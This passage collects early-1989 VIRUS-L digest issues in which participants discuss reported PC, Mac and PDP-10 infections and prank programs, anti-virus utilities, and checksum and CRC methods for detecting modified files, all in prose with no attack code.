  10424. this?  If so, I'm sure that many of us would be interested in hearing
  10425. about it.  The reports that I've heard make the virus sound an awful
  10426. lot like the Israel virus of the same name.
  10427.  
  10428. Ken
  10429.  
  10430. ------------------------------
  10431.  
  10432. Date:         Fri, 20 Jan 89 08:55:22 MEZ
  10433. From:         Thomas Heil <ZAT011@DJUKFA11.BITNET>
  10434. Subject:      PDP Virus
  10435.  
  10436. Hello folks!
  10437.  
  10438.   I have a  question concerning a  possible virus I  heard about. It's
  10439. running on a PDP (as far  as I know) and  shows the following symptoms
  10440. when it has installed itself:
  10441.  
  10442.   Sporadically the screen is cleared and the  message "I AM HUNGRY" is
  10443. displayed.  The machine then  waits for  input.  In  order  to get the
  10444. machine running  again  one has to  enter the word 'COOKIES'.  If done
  10445. so, everything   returns to normal,  otherwise  the  machine continues
  10446. waiting for input.
  10447.  
  10448.   Are  these symptoms known to anyone,  and does a vaccine  against it
  10449. exist? Please respond directly to me as I'm not on this list.
  10450.  
  10451. /T.H.
  10452.  
  10453. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+
  10454. | Thomas Heil                   | BITNET: ZAT011@DJUKFA11.BITNET     |
  10455. | Kernforschungsanlage Juelich  |                                    |
  10456. | Zentralabteilung Allgemeine   |                                    |
  10457. |    Technologie                |                                    |
  10458. | D-5170 Juelich                | Phone: +49 2461 61-6328            |
  10459. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+
  10460.  
  10461. ------------------------------
  10462.  
  10463. End of VIRUS-L Digest
  10464. *********************VIRUS-L Digest             Wednesday, 4 Jan 1989         Volume 2 : Issue 2
  10465.  
  10466. Today's Topics:
  10467. Forwarded virus discussion from Security list
  10468. LISTSERV problems with VIRUS-L
  10469.  
  10470. ---------------------------------------------------------------------------
  10471.  
  10472. Date: Tue, 3 Jan 89 14:18:40 est
  10473. From: ubu!luken@lehi3b15.csee.lehigh.edu
  10474. Subject: Forwarded virus discussion from Security list
  10475.  
  10476. I saw this on the Security discussion group and thought that it might
  10477. be an interesting topic to talk about here:
  10478.  
  10479. Ken
  10480.  
  10481. Date:         Fri, 16 Dec 88 15:40:00 EDT
  10482. Sender:       SECURITY Digest <SECURITY@UBVM>
  10483. From:         Stan Horwitz <V4039@TEMPLEVM>
  10484. Subject:      Re: Virus-writing
  10485.  
  10486.   Hello.  I was just at what was called an "emergency breifing" on
  10487. viruses.  The person who conducted the breifing is quite well known
  10488. for his work in the area of viruses and computer security.  His name
  10489. is Dr. Fred Cohen.  This was a very interesting meeting.  One thing
  10490. that surprised me is that public domain software is a smaller source
  10491. of viruses than proprietary software which comes in those nice shrink
  10492. wrapped packages.  Since there is no regulartory agency whose job it
  10493. is to certify software and it's potential for harboring viruses and
  10494. legitimate bugs, proprietary software becomes just as easy to infect
  10495. at the publishing house as any of your own disks.
  10496.  
  10497.   It also seems that few unversities or other institutions of higher
  10498. education admit to viruses being a major problem.  I don't know of any
  10499. courses offered in the subject of computer security and virus
  10500. detection.  Are there any at your school?
  10501.  
  10502.   A question of relevance to this discussion is along the following
  10503. lines.  Is it not the ethical responsibility of our government to
  10504. establish laws and guidelines which software must pass before being
  10505. distributed?  I know that the government has guidelines for itself
  10506. about the integrity of software for it's internal systems.  What about
  10507. for consumers in general?  We have laws regulating production of
  10508. auto's and other consume products and services.  The same should be
  10509. true of software.  There should be some sort of committee made up of
  10510. individuals from government and private industry who are responsible
  10511. for certifying software.  For gosh sakes, even floppy disks must under
  10512. some sort of certification!  It's kind of silly to certify the
  10513. integrety of floppy disks when we are allowed to purchase disks with
  10514. software that might very well have a virus due to the lack of
  10515. regulations and standards in this area.
  10516.  
  10517. ------------------------------
  10518.  
  10519. Date: Wed, 4 Jan 89 08:59:06 est
  10520. From: ubu!luken@lehi3b15.csee.lehigh.edu
  10521. Subject: LISTSERV problems with VIRUS-L
  10522.  
  10523. In addition to my having been out over the holidays, we've been having
  10524. some LISTSERV problems here which have been delaying VIRUS-L delivery.
  10525. Right now, there are a couple of digests waiting to be delivered...
  10526.  
  10527. Sorry for the delays.  Hopefully things will get fixed and production
  10528. will resume...  In the meantime, feel free to send in any submissions;
  10529. they will be included in a digest and the digests will be sent out as
  10530. soon as things are back up and running.
  10531.  
  10532. Ken
  10533.  
  10534. ------------------------------
  10535.  
  10536. End of VIRUS-L Digest
  10537. *********************VIRUS-L Digest              Friday, 20 Jan 1989         Volume 2 : Issue 20
  10538.  
  10539. Today's Topics:
  10540. Friday the 13th virus
  10541. re: PC Viruses
  10542. RE: Any connection between ping-pong virus and Word Perfect? (PC)
  10543. re: PDP Virus
  10544. UK virus information server
  10545.  
  10546. ---------------------------------------------------------------------------
  10547.  
  10548. Date:  Fri, 20 Jan 89 08:28:50 EST
  10549. From:  "John P. McNeely" <JMCNEELY@UTCVM.BITNET>
  10550. Subject: Friday the 13th virus
  10551.  
  10552.      I read this on the RISKS discussion list concerning the rumors of
  10553.      the Friday 13th virus.
  10554.  
  10555. - ---------------------------Original message----------------------------
  10556.  
  10557. Date: Wed, 18 Jan 1989 22:28:34 PST
  10558. From: Peter Neumann <neumann@csl.sri.com>
  10559. Subject: Friday the 13th Again
  10560.  
  10561. There were various reports of Friday-the-13th virus deletions in
  10562. Britain, attacking MS-DOS systems.  The so-called virus "has been
  10563. frisky and hundreds of people, including a large firm with over 400
  10564. computers, have telephoned with their problems," according to Alan
  10565. Solomon, director of S and S Enterprises, a data recovery center in
  10566. Chesham.  The virus reportedly bore similarities to the Friday the
  10567. 13th Israeli virus (13 May 1988, the previous Friday the 13th).
  10568. [Source: SF Chronicle, 14 Jan 1989, p. B1]
  10569.  
  10570. ------------------------------
  10571.  
  10572. Date:        20 January 89, 15:01:30 +0100 (MEZ)
  10573. From:        Otto Stolz <RZOTTO@DKNKURZ1.BITNET>
  10574. Subject:     re: PC Viruses
  10575.  
  10576. First Main Proposition of Virus Hunting: Every program designed to
  10577. catch viruses can be circumvented by virus-writers who know its
  10578. principles of operation.
  10579.  
  10580. Second Main Proposition of Virus Hunting: Every virus can be catched
  10581. and prevented from further propagating, if its principles of operation
  10582. are known.
  10583.  
  10584. > Does anyone know where we can get a program which either runs resident
  10585. > on a PC and prevents viruses from attacking the hard disk
  10586.  
  10587. According to the above 1st Proposition, there is no such thing!
  10588. However, you may obtain programs to prevent particular virus strains
  10589. from propagating to your hard disk, e.g. IMMUNE for 4 Israeli strains.
  10590.  
  10591. To prevent Boot-Sector-Viruses from propagating, you can buy SafeGuard
  10592. cards for your PCs, to prevent booting from floppy disks, altogether.
  10593. Proceed thus: boot from a clean, original DOS diskette, format your
  10594. hard disk, re-install software on it, and then install the SafeGuard
  10595. card (do not allow for further booting until you've completed these
  10596. steps).
  10597.  
  10598. > or non-resident programs which detect the presence of a virus?
  10599.  
  10600. Again, there is no such thing!  The best option you have: To detect
  10601. COM- and EXE-viruses, write your own program to compute some signature
  10602. value from all bytes in a file and compare it with a value obtained
  10603. earlier in the same way.  Lock away the source of your program and
  10604. every hints on its algorithm in a safe place, and apply it regularly
  10605. to every program file you use (including itself).
  10606.  
  10607. I hope that helps
  10608.                   Otto Stolz
  10609.  
  10610. [Ed. Fred Cohen has an interesting way of phrasing your two
  10611. propositions - "There ain't a horse that can't be rode or a man that
  10612. can't be throwed."]
  10613.  
  10614. ------------------------------
  10615.  
  10616. Date:     Fri, 20 Jan 89  16:12:59 MET
  10617. From:     <UNRZC6@DERRZE0.BITNET>  (Dirk Bode)
  10618. Subject:  RE: Any connection between ping-pong virus and Word Perfect? (PC)
  10619.  
  10620. Eldads Word Perfect problem sounds much like the problem we had at our
  10621. Computer Center. It is produced by a little memory resident virus
  10622. witch infects every COM or EXE File without damages, exept WP 4.2!!
  10623. Now, how can you detect this virus ?? First look at your memory
  10624. residents (with MAPMEM or such tools). There is after the virus is
  10625. installed a new program (nearly 1700 Byte). Every time you execute a
  10626. program the virus copy itself at the begining of this file. If you
  10627. execute an infected file the virus checks first if it's already
  10628. installed then execute the normal program. So, if you got this virus
  10629. you may never recognise until you use an copy of Word Perfect 4.2:
  10630. after infection you can't work from a HD.  If somebody is interessted
  10631. in a program to check if a file is already infected send me a note!
  10632.  
  10633. Dirk Bode
  10634. Regionales Rechenzentrum Erlangen
  10635. unrzc6@derrze0.bitnet
  10636.  
  10637. ------------------------------
  10638.  
  10639. Date:     Fri, 20 Jan 89 10:55 EST
  10640. From:     <SYSTEM@CRNLNS.BITNET>
  10641. Subject:  re: PDP Virus
  10642.  
  10643. Thomas,
  10644.  
  10645. Oh, the memories that brings back.
  10646.  
  10647. You neglected to mention that the "PDP" was a "PDP-10".  There are
  10648. lots of other PDPs in the world: PDP-11s and PDP-8s are still widely
  10649. used. PDP-10s have mostly gone the way of all good things. CompuServe
  10650. is still using a lot of them, but they don't run TOPS-10.
  10651.  
  10652. The program may have mutated since the last time I saw it (about 10
  10653. years ago), but here is what I remember.  The program you describe was
  10654. neither a "virus" nor a "worm" in the current senses of those terms.
  10655. Probably the closest term would be "trojan horse".
  10656.  
  10657. The "cookie" program was a privileged program running under TOPS-10.
  10658. It was usually run by one "friend" to annoy another.  It used a
  10659. privileged "ttcall" (TOPS-10 terminal I/O call) to allocate the
  10660. victim's terminal and would pester him or her mercilessly until either
  10661. the victim "fed" it a "cookie" or the perpetrator exited the program.
  10662. The computer's "system manager" had to be involved, since the program
  10663. needed to be "installed" (the Tops-10 terms were somewhat different),
  10664. so the program wasn't entirely uncontrollable.
  10665.  
  10666. Ah, those were the good old days: when 0.25 MIPS mainframes took up an
  10667. entire room, large disk drives were 20 MegaBytes, and you couldn't
  10668. afford more than 256KBytes of core memory.
  10669.  
  10670. Thanks for the nostalgia.
  10671.  
  10672. Selden E. Ball, Jr.
  10673. (Wilson Lab's network and system manager)
  10674.  
  10675. Cornell University                 Voice: +1-607-255-0688
  10676. Laboratory of Nuclear Studies        FAX: +1-607-255-8062
  10677. Wilson Synchrotron Lab            BITNET: SYSTEM@CRNLNS
  10678. Judd Falls & Dryden Road        Internet: SYSTEM@LNS61.TN.CORNELL.EDU
  10679. Ithaca, NY, USA  14853       HEPnet/SPAN: LNS61::SYSTEM = 44283::SYSTEM
  10680.  
  10681. ------------------------------
  10682.  
  10683. Date:       Thu, 19 Jan 89 14:28:52 GMT
  10684. From:       The Heriot-Watt Info-Server <infoadm@CS.HW.AC.UK>
  10685. Subject:    UK virus information server
  10686.  
  10687. UK redistribution list and archive server
  10688.  
  10689. For the information of other UK and European members of the virus-l
  10690. list, there is now a UK redistribution of the valert-l and virus-l
  10691. lists from Heriot-Watt University, Edinburgh.
  10692.  
  10693. The virus-l redistribution currently has 42 members, 14 of which are
  10694. academic site or company central redistribution points.
  10695.  
  10696. There is also an information server located at Heriot-Watt which
  10697. currently holds:
  10698.  
  10699. 1. All back issues of the virus-l list (in digest for from November, in
  10700.    monthly or weekly log form from April)
  10701. 2. Copies of the Trojan-PRO software from the RPICICGE archives
  10702. 3. Copies of the LEHIIBM1 listserver software archives
  10703. 4. Copies of the SCFVM listserver MAC software archives
  10704. 5. Risks digests from November onwards
  10705. 6. Various documentation on viruses, worms etc. Eg Gene Spaffords report
  10706.    on the internet worm.
  10707.  
  10708. The information server is similar to the UK distributed information servers
  10709. and takes requests in the form of a mail message to the server mail
  10710. address <info-server@cs.hw.ac.uk>
  10711.  
  10712. For help on the use of the server send a mail message with the request help, eg
  10713.  
  10714. request: help
  10715.  
  10716. For an index of the topics available send,
  10717.  
  10718. request: index
  10719. topic: index
  10720.  
  10721. For a list of all virus information available, send
  10722.  
  10723. request: virus
  10724. topic: index
  10725.  
  10726. If anyone has any reports or software which they would like to appear on this
  10727. server please feel free to send them to <davidf@cs.hw.ac.uk>. Updates on new
  10728. items will be posted to the UK redistribution list. Any European subscribers
  10729. who wish to be kept informed of software availability please drop me a note.
  10730.  
  10731. Finally, if anyone has a binhex 4.0 conversion utility running under unix
  10732. I would dearly like a copy.
  10733.  
  10734. Yours sincerely,
  10735.    Dave Ferbrache,                          <davidf@uk.ac.hw.cs> [Janet]
  10736.    Dept of computer science                 <davidf@cs.hw.ac.uk> [Internet]
  10737.    79 Grassmarket                           (UK) 031-225-6465 ext 553
  10738.    Edinburgh. EH1 2HJ
  10739.  
  10740. [Ed. Thanks for all your time and effort, Dave!  It is much
  10741. appreciated.]
  10742.  
  10743. ------------------------------
  10744.  
  10745. End of VIRUS-L Digest
  10746. *********************VIRUS-L Digest              Monday, 23 Jan 1989         Volume 2 : Issue 21
  10747.  
  10748. Today's Topics:
  10749. re: PDP virus
  10750. Size-changing viruses
  10751. Re: 1st and 2nd Main propositions of virus hunting
  10752. Anti-virus programs
  10753. RE: Otto's Rules
  10754.  
  10755. ---------------------------------------------------------------------------
  10756.  
  10757. Date: Fri, 20 Jan 89 16:46:52 EST
  10758. From: shafferj@amethyst.bucknell.edu
  10759. Subject: re: PDP virus
  10760.  
  10761. I haven't seen any PDP viruses, but the Cookie Monster seems to be a
  10762. classic program.  I wouldn't call it a virus -- at least, I've never
  10763. heard of any viral versions.  It's probably something someone inserted
  10764. when no-one else was looking.  Unless the perpetrator manages to patch
  10765. the operating system, you should be able to find the file somewhere
  10766. and delete it.  Also, you should be able to find the process (task?
  10767. I'm not very familiar with PDP terminology, and you didn't mention
  10768. which OS you were running on it anyway) and kill it.  Unless this is
  10769. an exotic version, it should be very easy to get rid of the problem.
  10770.  
  10771. Jim
  10772.  
  10773. ------------------------------
  10774.  
  10775. Date: Sun, 22 Jan 89 15:22:22 PST
  10776. From:     PJS%naif.JPL.NASA.GOV@Hamlet.Bitnet
  10777. Subject: Size-changing viruses
  10778.  
  10779. I gather that at least some of the virus-detection programs on the
  10780. market recognise viruses by looking for files or file extensions of
  10781. specific sizes.  What happens when a virus comes out which changes its
  10782. size with each infection according to a random number table?
  10783.  
  10784. Peter Scott (pjs@naif.jpl.nasa.gov)
  10785.  
  10786. ------------------------------
  10787.  
  10788. Date: Sat, 21 Jan 89 21:37:34 PST
  10789. From: crocker@tis-w.arpa
  10790. Subject: Re: 1st and 2nd Main propositions of virus hunting
  10791.  
  10792. In vol 2, # 20, Otto Stolz gives two propositions of virus hunting,
  10793. viz. (1) every program designed to catch viruses can be circumvented
  10794. by virus-writers who know its principles of operation, and (2) every
  10795. virus can be [caught] and prevented from further propagating if its
  10796. principles of operation are known.
  10797.  
  10798. These principles help characterize virus hunting as a game, in the
  10799. theoretical sense, but they include an implicit assumption that is
  10800. worth examining.
  10801.  
  10802. A "virus-hunter" can be viewed as a filter.  The user presents to the
  10803. filter a set of programs and asks it to separate out the programs that
  10804. have viruses from the ones that don't.  This is the same paradigm as
  10805. trying to sort out, say, bad ball bearings from a manufacturing
  10806. process using some sort of test, and there four classical outcomes.
  10807.  
  10808. 1. A truly good part will be seen to be good.  [Translation, a
  10809.    virus-free program will be seen to be virus-free.]
  10810.  
  10811. 2. A truly bad part will be seen to be bad.  [Translation, a program
  10812.    which contains a virus will be detected.]
  10813.  
  10814. 3. A truly bad program appears to be good.  This is a "false
  10815.    acceptance," or in the lingo of statistics, a Type II error.
  10816.    [Translation, a program which contains a virus slips through the
  10817.    filter.]
  10818.  
  10819. 4. A truly good program appears to be bad.  This is a "false
  10820.    rejection," or a Type I error.  [Translation, a program which is ok
  10821.    is rejected unfairly.]
  10822.  
  10823. Only a perfect test will have no false acceptances and no false
  10824. rejections.  Less than perfect tests must necessarily have some
  10825. combination of these errors.
  10826.  
  10827. Now the critical contribution from the world of statistics is that it
  10828. is almost always possible to trade off Type I for Type II errors.
  10829. Looking at only the Type I or only the Type II error rate doesn't tell
  10830. enough about the power of the test.  When comparing two different
  10831. tests, e.g. whether to use, say x-ray screening or a mechanical test
  10832. on ball bearings, one test is superior to another only if it yields
  10833. lower error rates for BOTH Type I and Type II errors.
  10834.  
  10835. How does this apply to virus hunting programs?  There are two ways a
  10836. virus hunting program can fail.  It can reject good programs or it can
  10837. pass bad programs.  So far as I can tell, virus hunting programs are
  10838. generally written with the implicit assumption that it is unacceptable
  10839. to reject a good program.  That is, they strive to have a very low
  10840. (ZERO?) false rejection rate.  As these tests are also less than
  10841. perfect, they necessarily have a significant false acceptance rate,
  10842. i.e. they fail to detect some programs that have viruses.
  10843.  
  10844. If the tolerance for false rejections were changed, i.e. if it became
  10845. acceptable to reject some programs which are really ok, then it is
  10846. entirely possible to build a virus hunter than cannot be circumvented.
  10847. At the extreme, rejecting EVERY program surely catches every virus,
  10848. but that throws the baby out with the bath water.  The interesting
  10849. question is how much better can we do?
  10850.  
  10851. As long as we are faced with imperfect tests, we will necessarily have
  10852. to live with non-zero error rates.  Nothing forces us to have these
  10853. errors be only false acceptances.  We can choose to have only false
  10854. rejections, if we wish.  [We can also choose to have a combination,
  10855. but let me ignore that in this note.]  Only when we apply some sort of
  10856. cost function can we choose appropriately.
  10857.  
  10858. Now, it might seem to readers of this forum that having a fail-safe
  10859. test would necessarily result in too many false rejections.  This is
  10860. indeed a relevant question, but I don't think any of us know what the
  10861. answer is.  It may well be possible to write a fail-safe virus hunter
  10862. that examines the innards of a candidate program to decide if it's ok,
  10863. and that most of the genuinely ok programs actually pass the test.
  10864.  
  10865. In the current world, where there are no ground rules for writing
  10866. programs to make them easy to examine, Stolz' principles indeed
  10867. characterize the situation for virus hunting programs that are not
  10868. permitted to reject good programs.  There are two ways to change the
  10869. game, however.
  10870.  
  10871. 1. Permit virus hunting programs to declare a program "unsafe" if it
  10872.    cannot PROVE that there is no virus.
  10873.  
  10874. 2. Set forth standards for programs to facilitate examination by this
  10875.    new class of virus hunters.
  10876.  
  10877. The first proposal, taken alone, may or may not be practical.  I do
  10878. not know how hard it is to write an acceptably accurate virus filter
  10879. that works on software prevalent today.  Some of my colleagues think
  10880. it is obviously too hard.  My own view is that it may well be easier
  10881. that it first seems to be.  In either case, I don't think there's
  10882. enough data, and I believe it would be worthwhile exploring the
  10883. question.
  10884.  
  10885. The latter proposal is much easier from a technical standpoint but
  10886. involves creation and promulgation of standards.  In the long run,
  10887. this may be the way we ultimately develop the means to trust the
  10888. software we depend on.
  10889.  
  10890. These ideas are taken from a paper Maria Pozzo and I have written, "A
  10891. Proposal for a Verification-Based Virus Filter," which is being
  10892. presented at the 1989 IEEE Symposium on Research in Security and
  10893. Privacy, Oakland, May 1-3.
  10894.  
  10895. The ideas expressed here are mine, and do not necessarily -- and in
  10896. some cases are known not to -- represent those of my colleagues, any
  10897. of our clients or sponsors, or the official position of Trusted
  10898. Information Systems.
  10899.  
  10900. Steve Crocker
  10901. Vice President
  10902. Trusted Information Systems
  10903.  
  10904. ------------------------------
  10905.  
  10906. Date:         Sat, 21 Jan 89 16:18:08 +0200
  10907. From:         "Yuval Tal (972)-8-474592" <NYYUVAL@WEIZMANN.BITNET>
  10908. Subject:      Anti-virus programs
  10909.  
  10910. I have a few good PUBLIC DOMAIN programs that checks if you have a
  10911. virus on a disk or in yuour memory. it is also possible to tell the
  10912. program to check your disk every X time if your hard disk is infected
  10913. by a virus.  Some of you probly heard of them:
  10914.  
  10915. IMMUNE, UNVIRUS, VIRALARM, RUNTIME, BB-VIRUS, CHKVIRUS etc...
  10916.  
  10917. Who wants them can send me mail and i'll be happy to send them...
  10918.  
  10919. Yuval Tal (NYYUVAL@WEIZMANN.BITNET)
  10920.  
  10921. ------------------------------
  10922.  
  10923. Date:         Fri, 20 Jan 89 23:03:14 EST
  10924. From:         Neil Goldman <NG44SPEL@MIAMIU.BITNET>
  10925. Subject:      RE: Otto's Rules
  10926.  
  10927. To put it another way, as Fred Cohen has said (i believe):
  10928.  
  10929. In general, it is impossible to detect viruses, but any particular
  10930. virus can be detected by a particular detection scheme.
  10931.  
  10932. I believe it is the ignorance of not only the general public, but also
  10933. computer professionals that compounds the perception that somewhere
  10934. out there exists a cure-all.  Everything WE CAN DO TO EDUCATE virus
  10935. inquirers of Otto's rules, the LESS the hysteria will continue.
  10936.  
  10937. - ----------------------------------------------------------------------
  10938. Neil A. Goldman                        NG44SPEL@MIAMIU.BITNET
  10939.  
  10940. Replies, Concerns, Disagreements, and Flames expected.
  10941. Mastercard, Visa, and American Express not accepted.
  10942. Acknowledge-To: <NG44SPEL@MIAMIU>
  10943.  
  10944. ------------------------------
  10945.  
  10946. End of VIRUS-L Digest
  10947. *********************VIRUS-L Digest              Monday, 23 Jan 1989         Volume 2 : Issue 22
  10948.  
  10949. Today's Topics:
  10950. re: PC Viruses
  10951.  
  10952. ---------------------------------------------------------------------------
  10953.  
  10954. Date:        23 January 1989, 09:20:53 EST
  10955. From:        David M. Chess  <CHESS@YKTVMV.BITNET>
  10956. Subject:     re: PC Viruses
  10957.  
  10958. In VIRUS-L v2n20, Otto Stolz <RZOTTO@DKNKURZ1.BITNET> writes
  10959. a number of things, including:
  10960.  
  10961. > First Main Proposition of Virus Hunting: Every program designed to
  10962. > catch viruses can be circumvented by virus-writers who know its
  10963. > principles of operation.
  10964. >                           ...
  10965. >                                 The best option you have: To detect
  10966. > COM- and EXE-viruses, write your own program to compute some signature
  10967. > value from all bytes in a file and compare it with a value obtained
  10968. > earlier in the same way.  Lock away the source of your program and
  10969. > every hints on its algorithm in a safe place, and apply it regularly
  10970. > to every program file you use (including itself).
  10971.  
  10972. While I agree with pretty much everything -else- Otto writes, I think
  10973. these statements are perhaps a bit too strong.  Consider, for instance,
  10974. a modification-detection program that works using a nice long CRC
  10975. (at least 30 bits), and that uses a "user-selectable" polynomial
  10976. (for instance, the program might prompt the user for a long string
  10977. when it's first run, and use that to find an irreducible polynomial).
  10978. If the program and the database are kept on external media (in a floppy
  10979. in a locked desk drawer, for instance), and the polynomial key is
  10980. also external (in the user's head, or on that locked floppy), AND
  10981. the program is run only after cold-booting the maching from a trusted
  10982. IPL floppy (perhaps the same one again), so that the checking program,
  10983. key, and database are never in the machine at the same time as a virus,
  10984. I think I would claim that knowing all about the checking program,
  10985. including having the commented source code, would do the virus-writer
  10986. NO GOOD AT ALL in trying to defeat it (as long as the user's secret
  10987. key isn't known, of course).  That's just because it's not possible
  10988. to make a probably-undetected change to a dataset if you don't know
  10989. the polynomial used for detection (and if the CRC uses enough bits).
  10990.  
  10991. Objections?
  10992.  
  10993. DC
  10994. Watson Research
  10995.  
  10996. ------------------------------
  10997.  
  10998. End of VIRUS-L Digest
  10999. *********************VIRUS-L Digest             Tuesday, 24 Jan 1989         Volume 2 : Issue 23
  11000.  
  11001. Today's Topics:
  11002. New Dirty Dozen listing!
  11003. FLU_SHOT PLUS 1.5  (PC)
  11004. What do we have here? (Mac)
  11005. Mac virus, part II
  11006. WordPerfect 4.2 and ping-pong virus (PC)
  11007. Known PC Viruses in the UK and their effects (longish)
  11008.  
  11009. ---------------------------------------------------------------------------
  11010.  
  11011. Date: Mon, 23 Jan 89 13:04:53 -0800
  11012. From: Steve Clancy <SLCLANCY@UCI.BITNET>
  11013. Subject: New Dirty Dozen listing!
  11014.  
  11015. Some kind user just uploaded the latest issue (8D) of the Dirty Dozen
  11016. listing! Eric Newhouse (current author of the list) moved from
  11017. California, and appeared to have dropped out of sight for a time.
  11018. This latest issue gives his new address and BBS # as follows:
  11019.  
  11020. The Dirty Dozen List
  11021. c/o Eric Newhouse
  11022. 40 Whitney Tavern Rd.
  11023. Weston, MA  02193
  11024.  
  11025. The Crest BBS @7
  11026. 617-498-8448  1200/2400/9600 [HST]
  11027.  
  11028. I have not yet had time to call the BBS, but plan to soon.  I do have
  11029. the most recent list however, and would be more than happy to post it
  11030. via LISTSERV, if ANYONE can please tell me how to do this.  I have
  11031. been entirely unsuccessful at getting UUENCODE or UUDECODE sent
  11032. to me via LISTSERV, or any other files for that matter.  Can anyone
  11033. give me a simple, thumbnail sketch on how to accomplish this???
  11034.  
  11035. The list is also available on my BBS (phone #'s below).
  11036.  
  11037. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  11038. |   Steve Clancy                      |  WELLSPRING RBBS            |
  11039. |   Biomedical Library                |  714-856-7996  24 HRS       |
  11040. |   P.O. Box 19556                    |  300-9600 N,8,1             |
  11041. |   University of California, Irvine  |  714-856-5087  nites/wkends |
  11042. |   Irvine, CA  92713                 |  300-1200 N,8,1             |
  11043. |                                     |                             |
  11044. |   SLCLANCY@UCI                      |  "Are we having fun yet?"   |
  11045. |   SLCLANCY@ORION.CF.UCI.EDU         |                             |
  11046. |                                     |                             |
  11047. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  11048.  
  11049. ------------------------------
  11050.  
  11051. Date:     MON JAN 23, 1989 18.48.23 EST
  11052. From:     "David A. Bader" <DAB3@LEHIGH>
  11053. Subject:  FLU_SHOT PLUS 1.5  (PC)
  11054.  
  11055. I just received a copy of Ross Greenberg's FLU_SHOT PLUS now in release
  11056. 1.5  (it was released on 1/15/89).  A lot of bugs and options have been
  11057. cleaned up.  Has anyone else out there had a chance to play with it
  11058. yet?
  11059.    -David Bader
  11060.     DAB3@LEHIGH
  11061.  
  11062. P.S. Please don't write to me specifically for a copy of the file.
  11063. I'll see what Ken has to say about putting on the LISTSERV at LEHIGH.
  11064.  
  11065. [Ed. David, bring a disk in, and we'll post it on the LISTSERV.
  11066. Thanks!]
  11067.  
  11068. ------------------------------
  11069.  
  11070. Date:         Mon, 23 Jan 89 23:34:18 ECT
  11071. From:         "Kenneth J. Hoover" <CONSP21@BINGVMA.BITNET>
  11072. Subject:      What do we have here? (Mac)
  11073.  
  11074.   Tonight, one of the print-room operators here came to me with a hard
  11075. drive that is exhibiting suspicious behavior.
  11076.  
  11077.   Here is what he gave me:
  11078.  
  11079.    1)  The system involved is a Macintosh with a hard disk.
  11080.    2)  All of the files on the drive (some 12-15 programs) which use the
  11081.        LaserWriter are incapable of printing.  this has been verified on
  11082.        LaserWriter plus and II/NTX models.
  11083.    3)  Error codes 28 and 02 are returned when they are returned at all.
  11084.    4)  The volume is supposedly locked (although he did not lock it) and this
  11085.        is hindering  the execution of Interferon 1.0 and Virus Detective.
  11086.  
  11087.   The user has had contact with bulletin boards, and also transfers
  11088. files to and from the macintosh computers here.
  11089.  
  11090.     And now, for my guess:
  11091.  
  11092.    This looks like something that is either interfering with the
  11093. Appletalk or printer ports; or a bug that looks for and messes up
  11094. PostScript printer commands/code in programs.
  11095.  
  11096.    Does anyone know what could be going on here?
  11097.  
  11098. Kenneth J. Hoover
  11099. UG Consultant, Public Terminal and Microcomputer Complex
  11100. SUNY-Binghamton
  11101. Binghamton, NY, USA
  11102.  
  11103. ------------------------------
  11104.  
  11105. Date:         Mon, 23 Jan 89 23:56:38 ECT
  11106. From:         "Kenneth J. Hoover   " <CONSP21@BINGVMA.BITNET>
  11107. Subject:      Mac virus, part II
  11108.  
  11109.     the user in the previous message just came to me and informed me that
  11110. after setting his system date back 20 days, the programs in question now
  11111. work, and the hard drive is now unlocked.
  11112.  
  11113.     Interferon v1.0 reports back clean when used.
  11114.  
  11115.    It appears the date of activation was 1/22/89.
  11116.  
  11117. Ken Hoover (CONSP21@BINGVMA.BITNET)
  11118.  
  11119. ------------------------------
  11120.  
  11121. Date:         Tue, 24 Jan 89 14:02:23 IST
  11122. From:         "Eldad Salzmann (+972)-3-494520" <ELDAD@TAUNIVM.BITNET>
  11123. Subject:      WordPerfect 4.2 and ping-pong virus (PC)
  11124.  
  11125. Reply to Dirk Bode <unrzc6@derrze0> re my query.
  11126.  
  11127. Dirk:
  11128.  
  11129. Thanks a lot. Your letter to this forum following my query about WP
  11130. and viruses really described precisely the problem I was facing and
  11131. substantiated my suspicion.
  11132.  
  11133. I shall start from the end: I reformatted the hard disk and
  11134. re-installed WordPerfect from diskettes. Everything works now just
  11135. fine. As you probably remember, I couldn't load it from the HD -- it
  11136. kept looking for its main program on the diskette in drive A (well,
  11137. occasionally it looked also in drive B).
  11138.  
  11139. I *did* check the RAM with MEMMAP, and I *did* see some unidentified
  11140. chunk of 1700 bytes which no program claimed to own. I did that long
  11141. before you, Dirk, wrote I should check the memory, which really
  11142. confirmed what I suspected.
  11143.  
  11144. At the moment my friend's disk seems to work fine, but there is a new
  11145. problem: the hidden files turn out to be damaged somehow every couple
  11146. of days. I cannot think of any plausible explanation for that. Do
  11147. viruses damage the two hidden files of the disk, to the extent that
  11148. the affected disk is brought to a standstill after just running the
  11149. autoexec.bat file?  The remedy we found for this problem is just
  11150. performing SYS C: each time the case reappears.
  11151.  
  11152. Revenons a nos moutons (our "lamb" in this case is the ping pong virus
  11153. :) - Since we saw on screen a bouncing little ball, I attributed the
  11154. problems we had with WPerfect to the bouncing ping-pong virus. You,
  11155. Dirk, presented it under totally new light: you say there's a special
  11156. virus which only affects WP 4.2. Do you really think it's likely that
  11157. anyone would write such a program, and that this program *just*
  11158. happened to contaminate my friend's disk? That's what I would call
  11159. "odd". But then, there *are* oddities, lots of them...
  11160.  
  11161.  
  11162. Eldad Salzmann    <Eldad@TAUNIVM)
  11163.  
  11164. ------------------------------
  11165.  
  11166. Date: 23 Jan 89 11:54:29 GMT (Mon)
  11167. From: Alan Jay <alanj@ibmpcug.co.uk>
  11168. Subject: Known PC Viruses in the UK and their effects
  11169.  
  11170. The article below summarises the viruses which have been known to
  11171. affect IBM PCs and compatibles in the United Kingdom.  It is written
  11172. by Dr.  Alan Solomon (drsolly@ibmpcug.CO.UK), the chairman of the IBM
  11173. PC User Group in the UK and appears in the February 1989 issue of
  11174. Connectivity, the newsletter of the User Group.
  11175.  
  11176. This article is (C) Copyright 1989 The IBM PC User Group (UK).
